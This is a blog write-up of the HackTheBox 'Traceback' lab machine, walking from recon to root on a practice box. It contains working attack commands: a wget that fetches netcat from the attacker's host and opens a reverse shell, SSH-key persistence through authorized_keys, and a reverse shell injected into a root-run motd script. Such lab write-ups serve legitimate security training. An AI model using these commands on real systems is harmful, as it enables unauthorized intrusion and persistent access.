Posts Hackthebox Traceback writeup
Post
Cancel

Hackthebox Traceback writeup

Information

ColumnDetails
NameTraceback
Points20
Difficultyeasy
CreatorXh4H
Out On14 march 2020
creator’s Twitter@RiftWhiteHat

Summary

  • Finding the web shell uploaded by Creator
  • Getting a actual bash shell wih nc as webadmin
  • Running the luvit script with privesc.lau
  • Adding the public ssh key to authorized_keys
  • Getting user flag
  • running pspy to get the running process
  • Abusing the script running as root
  • Getting root flag

Got root

...

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
➜  prashant git:(master) ✗ nmap -sV -sC -T4 -p- traceback.htb 
Nmap scan report for traceback.htb (10.10.10.181)z
Host is up (0.29s latency).
Not shown: 65513 closed ports
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp    open     http           Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
3330/tcp  filtered mcs-calypsoicf
5018/tcp  filtered unknown
5238/tcp  filtered unknown
9069/tcp  filtered unknown
10820/tcp filtered unknown
12908/tcp filtered unknown
17068/tcp filtered unknown
18106/tcp filtered unknown
20168/tcp filtered unknown
22631/tcp filtered unknown
24199/tcp filtered unknown
27286/tcp filtered unknown
27473/tcp filtered unknown
28023/tcp filtered unknown
46715/tcp filtered unknown
47592/tcp filtered unknown
48033/tcp filtered unknown
50766/tcp filtered unknown
59029/tcp filtered unknown
62037/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1803.62 seconds

After seeing that port 80 is opened i opened it on my browser. And got the following webpage

webpage

This was looking like someone just changed the webpage after owning it.But no this was cretaor himself

I ran gobuster and dirb But it doesnt give me anything Interesting.

After viewing-source of the page there is a commented line at the bottom of the webpage

Identifying the web shell

Some of the best web shells that you might need

view-source

I thought maybe the user want us to use some web-shells

But after googling the same line i got a github repo at the top.Really interesting

googling the line

https://github.com/TheBinitGhimire/Web-Shells

This repo includes some very cool web shells.And most interesting thing the creator of the box already forked the repo, So it is confirmed that we have to use these web shells somewhere

So the creator wants us to use these web shells But i didnt find any upload page or something from where i can use the webshell

Then i just tried to copy paste the name of the shell to check if the creator already uploaded it on the box.

Tried guessing

Getting a shell as webadmin

After copying pasting many shell names, I got success on the smevk.php

smvek.php

Tried Creds admin:admin and i m in.

shell

There is an execute command option in the web shell so i just want a bash/sh shell now.

I hosted the python http server

1
2
➜  Tools git:(master) ✗ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

And execute the following command that will download the netcat from my server and giving it execute permission and executing it to get reverse shell as webadmin

1
wget http://10.10.14.194:8080/nc /tmp/nc;chmod +x /tmp/nc;/tmp/nc -e /bin/bash 10.10.14.194 1234

And i got the shell finally

1
2
3
4
5
➜  prashant git:(master) ✗ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.194] from (UNKNOWN) [10.10.10.181] 49004
whoami
webadmin

And After looking further i decided to get a proper ssh shell as the port 22 was opened I copied my id_rsa.pub to the /home/webadmin/.ssh/authorized_keys

1
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDh/ub/0EON2VMcbDR9d9SnqU8cGsad08Ecr/Wbd2cfB+/08vCs6HIjdz2bSz+96QKODz6qP2irEOn8uAPIalCq0oB028LL4H/hZBQag8/UluQRrc2sfdImt5wm/cAN/KNPORWfVYxMOlBsIf5UTs7lMCoi43FRCpuZhGcu8CmWvHPJ1PMd/z0Cpnibq330u7vxBzm5mvm/5HWNst5BZ5NNTIEjWtoz4jj0fyFLyzVfJS4q7AQ9q4L4MndxEcG2rfnQyrko50NqwWiUpM7WpyT9QfyuEV5cYmgdbYugt2sdvOeJRqeIw/qyRFQs4XxJnz6Cxolm9ju4llNb2/ug6fsdK/cZauxSYh7Ddu06sTZoKexeMKVj/saHah76uwkdvT+sTXVYv9uwOdTC8KcwlmdmMAg3NUXWltaMNjryqon+g/81Ky2ugCCpG+jJB5SJxupwLJ1hhhujP5RCLk3Ebo9pL0twJhBdbxPLjMunEgMUKPN4u59gNMxOetAYYpcb9Bc= prashant@parrot" >> authorized_keys

And login via my id_rsa as webadmin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 ➜  prashant git:(master) ✗ ssh -i .ssh/id_rsa webadmin@10.10.10.181
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 



Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu Feb 27 06:29:02 2020 from 10.10.14.3
webadmin@traceback:~$ 

Privilege escalation to sysadmin

And running a simple command sudo -l gave the hint to get the user flag

1
2
3
4
5
6
webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/webadmin/luvit

So i can run the script luvit as sysadmin. The Dir has also some file like note.txt and privesc.lua

1
2
3
webadmin@traceback:~$ cat note.txt 
- sysadmin -
I have left this tool to practice Lua. Contact me if you have any question.
1
2
3
4
webadmin@traceback:~$ cat privesc.lua 
local test = io.open("/home/sysadmin/.ssh/authorized_keys", "a")
test:write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDp3ANscyE/wYAJhH6FTHE7rbj+AlZs3ziQTrjojQ913UUFd5FHSfI83ed8efWrFCZB0RJKRQvFbsVu1ts2YuCM+Ziekn9uXarA47YHo7gfXpq0Ttb1jliooh8zcCd7ooFMjoRFnkBwKmGG/nknIQJQlEtyyEoCeBPpBLA/g7AHCuztZ38JWQUoJHBI1X8zm3IjPsDnrfcX6DqYGpEYmPY0isUQsCVOM7RXZVSZTyoJy9X7Iw/j8s1eiShvgs9o2N6HL7bNt8xDeRnM99k2uf5m5TaQ5peex/3SceUnqXkeueqq4VqE7QJZPMlPuMezh2bauqh0fNVyBIUFtFrrtGZF6+xkYiE443Ci/uGWqOvYhF4NgbfsWIwgIh/r6XziOWqDuoJpgU5f4s1IYJTMYoKdRkSELMukUmOJGuFEuaeZfzwniz9+1Y+SEOCOeGe2gTWnr9m9OzCozGrAGDEvF2kVGgcby+6/9ZFN5PQqAZkhNmIulYmlN52ecybeJTsVsKE= root@parrot\n")
test:close()

So basically lua is a programming language (Found it on google) And the privesc.lua a lua file which is opening the authorized_keys writing the id_rsa.pub(public keys) to it.

I found that this is a hint from the creator. So,We have to run the luvit as sysadmin and pass the privesc.lua as argument

I added my id_rsa.pub to the privesc.lua and run the luvit script with the following (Used nano to edit the file)

1
webadmin@traceback:~$ sudo -u sysadmin /home/webadmin/luvit privesc.lua

And logged in as sysadmin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
➜  prashant git:(master) ✗ ssh -i .ssh/id_rsa sysadmin@10.10.10.181
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 



Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Mar 15 00:25:36 2020 from 10.10.14.162
$ 

User.txt

Grabbed the user flag after spawning a bash interactive shell

1
2
3
$ bash -i
sysadmin@traceback:~$ cat user.txt
c2--------------------------6020

Privilege Escalation to Root

After 5 minutes i decided to run pspy64 to check which process are running as root And found an intereting one

1
sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new

And a script 91-release-upgrade running as root when there is a login from ssh

i looked in the dir /etc/update-motd.d and found the script 91-release-upgrade

1
2
3
4
5
6
7
8
9
10
sysadmin@traceback:/etc/update-motd.d$ ls -la
total 32
drwxr-xr-x  2 root sysadmin 4096 Aug 27  2019 .
drwxr-xr-x 80 root root     4096 Aug 25  2019 ..
-rwxrwxr-x  1 root sysadmin  981 Mar 15 00:38 00-header
-rwxrwxr-x  1 root sysadmin  982 Mar 15 00:38 10-help-text
-rwxrwxr-x  1 root sysadmin 4264 Mar 15 00:38 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Mar 15 00:38 80-esm
-rwxrwxr-x  1 root sysadmin  299 Mar 15 00:38 91-release-upgrade
sysadmin@traceback:/etc/update-motd.d$

We have read and write permission to the file So, We can easily edit the file by including a reverse shell in it and logging in from ssh, So the script can executed and we will get a reverse shell as root

1
2
3
4
5
6
7
8
9
10
sysadmin@traceback:/etc/update-motd.d$ cat 91-release-upgrade 
#!/bin/sh

# if the current release is under development there won't be a new one
if [ "$(lsb_release -sd | cut -d' ' -f4)" = "(development" ]; then
    exit 0
fi
if [ -x /usr/lib/ubuntu-release-upgrader/release-upgrade-motd ]; then
    exec /usr/lib/ubuntu-release-upgrader/release-upgrade-motd
fi

There is an if condition if it false the program is exited to be true(0) So, i need to add reverse shell code before it

I added the nc reverse shell at the top of the script so the rev shell code can execute first

1
2
3
4
5
6
7
8
9
#!/bin/sh
/tmp/nc -e /bin/bash 10.10.14.194 2345
# if the current release is under development there won't be a new one
if [ "$(lsb_release -sd | cut -d' ' -f4)" = "(development" ]; then
    exit 0
fi
if [ -x /usr/lib/ubuntu-release-upgrader/release-upgrade-motd ]; then
    exec /usr/lib/ubuntu-release-upgrader/release-upgrade-motd
fi

And started my listner on port 2345

As soon as i login from ssh as sysadmin i got root shell

Root.txt

1
2
3
4
5
6
7
8
9
➜  prashant git:(master) ✗ nc -nlvp 2345
listening on [any] 2345 ...
connect to [10.10.14.194] from (UNKNOWN) [10.10.10.181] 49042
whoami
root
hostname
traceback
cat /root/root.txt
ccda-----------------------585d6

And we got root

Thanks for reading, a single feedback will be appreciated !!!

If you want to get notified as soon as i upload something new to my blog So just click on the bell icon you are seeing on the right side – > and allow push notification

Updated Aug 30, 2020 2020-08-30T09:39:53+00:00
This post is licensed under CC BY 4.0

© 2020 Prashant Saini. All rights reserved.